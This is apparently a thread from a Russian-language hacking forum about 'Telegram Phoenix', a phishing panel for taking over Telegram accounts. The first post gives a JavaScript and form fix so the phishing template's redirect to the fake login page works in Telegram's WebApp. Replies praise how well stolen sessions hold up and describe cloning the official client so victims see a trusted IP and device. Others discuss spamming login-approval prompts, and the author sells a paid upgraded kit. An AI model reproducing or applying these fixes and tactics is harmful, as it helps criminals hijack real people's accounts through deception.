• XSS.stack #1 – первый литературный журнал от юзеров форума

фишинг Telegram Phoenix | Панель для фишинга телеграм аккаунтов

Фикс работы шаблона в WebApp Telegram
Fix template in WebApp Telegram

В /var/www/tweb/template: открываете html любого шаблона и заменяете:
JavaScript:
    <script>
      function redirectToLogin() {
        window.location.href = window.location.href + "log"
      }
    </script>

на это:
JavaScript:
<script>
const currentUrl = window.location.href.split("#")[0].replace(/\/$/, "")
const redirectUrl = `${currentUrl}log`
const form = document.getElementById("redirectForm")

function redirectToLogin() {
  form.action = redirectUrl
  form.submit()
}
 </script>

и над кнопкой вставляете следующий form:
Код:
<form id="redirectForm" action="" method="get" style="display: none"></form>

так же вы можете поиграться с состояниями localstorage чтобы сохранять прогресс и не показывать всегда шаблон при открытии ( если закрыт в этапе ввода кода )
для упрощения создайте отдельные файлы скрипта и стилей которые вы будете уже вызывать непосредственно в html-разметке.

Пожалуйста, обратите внимание, что пользователь заблокирован
Автор перезалей пожалуйста. Или мб у кого на диске осталось. линк на Мегу сдох

Спасибо Nick Diesel за перезалив, действительно ссылка умерла.
Тему отредактировать не могу, рабочие ссылки выше!

Если к слову кому понравилась работа и функционал скрипта вы можете приобрести более обширную и обновленную версию открытого кода с множествами автоматизациями и интересным функционалом, этим вы поддержите меня как автора и замотивируете продвигать этот проект дальше, все обновления я буду предоставлять тем кто поддержал проект, если заинтересованы напишите мне в Telegram.

If, by the way, anyone liked the work and functionality of the script, you can purchase a more extensive and updated version of the open source code with many automations and interesting functionality, this will support me as the author and motivate me to promote this project further, I will provide all updates to those who supported the project, if interested write to me on Telegram.

Спасибо Nick Diesel за перезалив, действительно ссылка умерла.
Тему отредактировать не могу, рабочие ссылки выше!
+

P.S.: Не стесняйся писать ПМ.

Автору однозначный респект помог разобраться в коде поотвечал даже на самые тупые вопросы что достойно уважение не каждый будет тратить свое время на подобное) Что касается исходника я очень доволен до этого у меня было знакомство только с Tgcrime, ну это на голову выше, сесси держаться норм все работает без каких либо сбоев и багов ну и + есть скилет и если у вас есть базовы знания сможете уже для себя редактировать или улучшить как душа пожелает.

Так же клонирование официального репозитория позволяет нам при авторизации высвечивать реальный IP и устройство жертвы, что прибавляет плюс к доверии.
Кто-нибудь может прислать скриншот официального приложения Телеграм где видно айпи адрес при авторизации либо других сессий?

одно время была тема логина только из под номера (долбишься и человеку спамит разрешить доступ или нет) если человек нажимал да то могла произойти магия
попробуйте поискать еще сервисы у тг и официальные формы авторизации покурить

Последнее редактирование:
актуальная тема?
есть более актуальная и многофункциональная версия, подробнее в лс телеграм - если кому интересно

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх